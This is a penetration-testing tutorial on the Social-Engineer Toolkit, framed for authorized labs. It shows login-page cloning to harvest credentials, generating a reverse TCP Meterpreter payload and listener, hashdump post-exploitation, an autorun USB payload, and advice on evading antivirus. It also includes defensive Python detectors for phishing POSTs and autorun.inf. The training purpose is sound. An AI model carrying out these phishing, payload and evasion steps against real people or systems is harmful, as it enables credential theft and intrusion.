Social-Engineer Toolkit (SET) for Penetration Testing

Professional Tutorial on the Social-Engineer Toolkit (SET) for Penetration Testing

Introduction

The Social-Engineer Toolkit (SET) is an open-source framework designed to facilitate social engineering attacks, enabling penetration testers to simulate real-world threats like phishing, credential harvesting, and malicious payload delivery. Developed by David Kennedy (ReL1K) of TrustedSec, SET integrates seamlessly with the Metasploit Framework to automate attack vectors such as website cloning, spear-phishing, and USB-based exploitation. Social engineering exploits human vulnerabilities, making SET a critical tool for testing organizational security awareness.

This tutorial provides a detailed guide on using SET for ethical penetration testing, covering installation, key features, usage, and a practical example of a phishing attack. Aimed at intermediate pentesters, it assumes familiarity with Linux, networking, and Metasploit basics (as covered in prior tutorials). All activities must be conducted in authorized lab environments (e.g., Web Security Academy, Hack The Box, TryHackMe) to comply with legal and ethical standards. Unauthorized use is illegal and unethical.

This guide draws from TrustedSec’s documentation and community resources.

What is the Social-Engineer Toolkit (SET)?

SET is a Python-based framework that automates social engineering attacks, leveraging human trust to gain unauthorized access to systems or data. It includes modules for phishing, website cloning, infectious media generation, and more, often paired with Metasploit payloads for exploitation. SET is particularly effective for testing user susceptibility to phishing emails, fake websites, or malicious files.

Key Features

  • Spear-Phishing Attacks: Sends targeted phishing emails with malicious attachments or links.
  • Website Attack Vectors: Clones login pages to harvest credentials or deliver payloads.
  • Infectious Media Generator: Creates malicious USB or CDROM AutoRun files.
  • Payload Integration: Uses Metasploit payloads (e.g., Meterpreter) for exploitation.
  • Multi-Attack Vectors: Combines phishing, web, and client-side attacks.
  • Cross-Platform Support: Targets Windows, Linux, macOS, and Android.
  • Customizable Templates: Supports custom email and website templates for realistic attacks.
  • Automation: Simplifies complex attack workflows with a menu-driven interface.

System Requirements

  • Operating System: Kali Linux (recommended), Parrot OS, or any Linux distribution with Python and Metasploit.
  • Dependencies: Python 3, Metasploit Framework, and libraries like pycrypto, pyopenssl.
  • Hardware: Minimum 4GB RAM; 8GB+ recommended for Metasploit integration.
  • Network: Stable connection; public IP or port forwarding for external attacks.
  • Lab Setup: Virtual machines (e.g., VirtualBox, VMware) or cloud labs for testing targets.

Installation and Setup

SET is pre-installed on Kali Linux but requires configuration for optimal use. Below are the steps to install and set up SET.

Installation Steps

  1. Update Kali Linux:

sudo apt update && sudo apt upgrade -y

  2. Install SET (if not pre-installed; the Kali package is named set and provides the setoolkit command):

sudo apt install set -y

Alternatively, clone from GitHub:

git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
pip3 install -r requirements.txt
python3 setup.py install

  3. Install Metasploit (required for payloads):

sudo apt install metasploit-framework -y
sudo msfdb init

  4. Verify SET Installation:

setoolkit

This launches the SET menu.

  5. Update SET:

cd social-engineer-toolkit
git pull

Troubleshooting

  • Dependency Errors: Install missing Python libraries:

pip3 install pycrypto pyopenssl

  • Metasploit Issues: Ensure PostgreSQL is running (sudo systemctl start postgresql).
  • Permission Errors: Run SET with sudo setoolkit if needed.

SET Usage Guide

SET operates through a menu-driven interface, offering various attack vectors. Below is a detailed overview of its usage.

Launching SET

Start SET:

sudo setoolkit

Output:

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 8.0.3 [---]

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
...

Navigate using numbers (e.g., 1 for Social-Engineering Attacks).

Main Menu Options

  • 1. Social-Engineering Attacks:
    • Spear-Phishing Attack Vectors
    • Website Attack Vectors
    • Infectious Media Generator
    • Create a Payload and Listener
  • 2. Penetration Testing (Fast-Track): Automated exploits.
  • 3. Third Party Modules: Community-contributed tools.
  • 99. Exit: Close SET.

Key Attack Vectors

  • Spear-Phishing: Sends emails with malicious attachments or links.
  • Website Attack Vectors:
    • Credential Harvester: Clones login pages to capture credentials.
    • Tabnabbing: Replaces browser tabs with malicious pages.
    • Java Applet Attack: Delivers payloads via Java applets.
  • Infectious Media Generator: Creates malicious USB/CDROM files.
  • Create a Payload and Listener: Generates standalone payloads with Metasploit.

Common Commands

SET automates most tasks through its menu, but you can script actions or integrate with Metasploit:

msfconsole -r /path/to/set_payload.rc

Practical Example: Phishing Attack with Credential Harvesting

This example demonstrates using SET to clone a website’s login page (e.g., a WordPress admin panel) to harvest credentials in a controlled lab environment. Assume the attacker’s Kali Linux IP is 192.168.1.100 and the target is a lab user on a Windows 10 VM (192.168.1.10).

Step 1: Setup

  1. Prepare Environment:
    • Use a Windows 10 VM as the target (VirtualBox or TryHackMe).
    • Ensure Metasploit is running:

sudo systemctl start postgresql
msfconsole

  2. Launch SET:

sudo setoolkit

Step 2: Configure Credential Harvester

  1. Select Social-Engineering Attacks (1).
  2. Choose Website Attack Vectors (2).
  3. Select Credential Harvester Attack Method (3).
  4. Choose Site Cloner (2).
  5. Configure:
    • IP for Reverse Connection: 192.168.1.100 (Kali IP).
    • URL to Clone: http://192.168.1.10/wordpress/wp-login.php (lab WordPress login page).
  6. SET starts a local web server to host the cloned page.

Output:

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Cloning http://192.168.1.10/wordpress/wp-login.php
[*] Web server started on http://192.168.1.100:80

Step 3: Deliver the Phishing Page

  1. Simulate a phishing email:
    • Send a link to http://192.168.1.100 via email or direct the target to it (in a lab, manually visit the URL on the Windows VM).
  2. When the target enters credentials (e.g., admin:password123), SET captures them:

Output:

[*] Harvested credentials:
Username: admin
Password: password123
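
From the defender's side, the submission in Step 3 shows up in web proxy logs as a form POST to a host that is not an approved login origin. The following is an added example (not part of SET or the original tutorial) that flags such requests; the log format, the approved-host list and the sample lines are constructed assumptions, with addresses taken from this lab.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed proxy log lines: time, client, method, URL, status (not real traffic).
SAMPLE_LOG = """\
2025-09-06T10:01:02 192.168.1.10 GET http://192.168.1.100/ 200
2025-09-06T10:01:40 192.168.1.10 POST http://192.168.1.100/ 302
2025-09-06T10:05:11 192.168.1.20 POST http://192.168.1.10/wordpress/wp-login.php 302
2025-09-06T10:07:30 192.168.1.21 POST https://shop.example.test/cart 200
this line is malformed
"""

# Assumption: hosts where users are expected to submit credentials in this lab.
APPROVED_LOGIN_HOSTS = {"192.168.1.10"}


def is_ip_literal(host):
    """True if the URL host is a bare IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def find_suspect_posts(log_text, approved=APPROVED_LOGIN_HOSTS):
    """Flag POSTs to unapproved hosts that are also cleartext or IP-literal."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[2] != "POST":
            continue  # skip malformed lines and non-submissions
        timestamp, client, _, url, _ = parts
        target = urlsplit(url)
        host = target.hostname or ""
        if host in approved:
            continue
        reasons = []
        if target.scheme == "http":
            reasons.append("cleartext HTTP")
        if is_ip_literal(host):
            reasons.append("IP-literal host")
        if reasons:  # an unapproved host alone is too noisy to alert on
            findings.append({"time": timestamp, "client": client,
                             "url": url, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspect_posts(SAMPLE_LOG):
        print(finding)
```
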

Step 4: Integrate with Metasploit (Optional)

To deliver a payload:

  1. Return to SET’s main menu, select Create a Payload and Listener (4).
  2. Choose Metasploit Windows Reverse TCP Meterpreter (2).
  3. Configure:
    • LHOST: 192.168.1.100
    • LPORT: 4444
    • Output: payload.exe
  4. SET generates payload.exe and a Metasploit resource file.
  5. Start the Metasploit listener:

msfconsole -r /root/set/payload.rc

Output:

[*] Started reverse TCP handler on 192.168.1.100:4444

  6. Deliver payload.exe to the target (e.g., via the cloned website or email attachment).
  7. When executed, Metasploit receives a session:

[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.10:54321)

meterpreter > sysinfo

Output:

Computer    : WIN10-VM
OS          : Windows 10 (Build 19041)

Step 5: Post-Exploitation

Use Meterpreter commands:

  • screenshot: Capture the desktop:

meterpreter > screenshot

Output:

Screenshot saved to: /root/.msf4/screenshots/win10_2025-09-06.png

  • hashdump: Dump password hashes:

meterpreter > hashdump

Practical Example: USB Attack

  1. Select Infectious Media Generator (3) from the main menu.
  2. Choose File-Format Exploits (1).
  3. Select Metasploit Windows Reverse TCP Meterpreter (2).
  4. Configure:
    • LHOST: 192.168.1.100
    • LPORT: 4444
    • Output: autorun.exe
  5. Copy autorun.exe and autorun.inf to a USB drive.
  6. Start the Metasploit listener (as above).
  7. When the USB is inserted into the target VM, it triggers the payload, opening a Meterpreter session.
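
For the blue-team half of this exercise, removable media can be checked for an autorun.inf that launches a program before the drive is trusted. The following is an added example (not part of SET or the original tutorial) that parses the file and reports the directives that would start an executable; the sample file contents are constructed, and only the autorun.exe name comes from the steps above.

```python
import configparser
from pathlib import Path

# Constructed autorun.inf contents for illustration; not SET output.
SAMPLE_AUTORUN = """\
[AutoRun]
; constructed sample
open=autorun.exe
icon=autorun.ico
label=Backup
shell\\open\\command=autorun.exe
"""

# Directives in the [autorun] section that cause a program to be started.
EXEC_KEYS = ("open", "shellexecute")


def audit_autorun(text):
    """Return (directive, target) pairs in [autorun] that would launch a program."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        parser.read_string(text)
    except configparser.Error:
        return [("unparseable", "")]  # treat a malformed file as a finding
    # Section and key names are case-insensitive in autorun.inf.
    section = next((s for s in parser.sections() if s.lower() == "autorun"), None)
    if section is None:
        return []
    hits = []
    for key, value in parser.items(section):  # configparser lowercases keys
        is_verb = key.startswith("shell\\") and key.endswith("\\command")
        if key in EXEC_KEYS or is_verb:
            hits.append((key, value.strip()))
    return hits


def scan_volume(root):
    """Audit an autorun.inf (any letter case) at the root of a mounted volume."""
    for entry in Path(root).iterdir():
        if entry.is_file() and entry.name.lower() == "autorun.inf":
            return audit_autorun(entry.read_text(errors="replace"))
    return []


if __name__ == "__main__":
    for directive, target in audit_autorun(SAMPLE_AUTORUN):
        print(f"launch directive {directive!r} -> {target!r}")
```
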

Best Practices and Tips

  • Ethics and Legality: Obtain explicit permission; test only in lab environments (e.g., TryHackMe, Hack The Box). Unauthorized attacks are illegal.
  • Lab Setup: Use virtual machines (Windows 10, Metasploitable3) or cloud labs to simulate targets.
  • Realism: Customize email templates (/root/set/config/set_config) for convincing phishing campaigns.
  • Integration: Pair with Metasploit (for payloads), msfvenom (for custom payloads), or Burp Suite (for web traffic analysis).
  • Evasion: Use msfvenom’s encoding options or Veil/TheFatRat for undetectable payloads (see prior tutorials).
  • Common Pitfalls:
    • Ensure LHOST is reachable (use public IP or port forwarding for external targets).
    • Test email delivery in a lab to avoid anti-spam filters.
  • Resources:
    • Official Docs: https://github.com/trustedsec/social-engineer-toolkit
    • TryHackMe: “Social Engineering” and “Metasploit” rooms
    • Hack The Box: “Phishing” challenges
    • Web Security Academy: https://portswigger.net/web-security for web attack labs
    • Hackers Arise: https://hackers-arise.com/post/2023/12/31/social-engineering-toolkit

Visual References

SET is a menu-driven tool, so visuals are primarily terminal outputs or cloned web pages. For screenshots:

  • GitHub: https://github.com/trustedsec/social-engineer-toolkit (shows menu and attack outputs).
  • TryHackMe: “Social Engineering” room displays SET menus and credential harvesting.
  • Medium Articles: Search “SEToolkit tutorial” (e.g., https://medium.com/@securitygeek/social-engineering-toolkit-guide) for terminal and phishing page screenshots.
  • Hackers Arise: https://hackers-arise.com/post/2023/12/31/social-engineering-toolkit shows setup and execution.

Conclusion

The Social-Engineer Toolkit (SET) is a powerful ally for penetration testers, enabling realistic simulations of social engineering attacks. By mastering its attack vectors (phishing, website cloning, and infectious media), you can test human vulnerabilities ethically and effectively. Always prioritize legal and authorized testing in lab environments like TryHackMe, Hack The Box, or Web Security Academy to build skills and enhance organizational security.

Author: Engr. M A Rashid Rony
Date: September 6, 2025
For updates, visit: https://github.com/trustedsec/social-engineer-toolkit
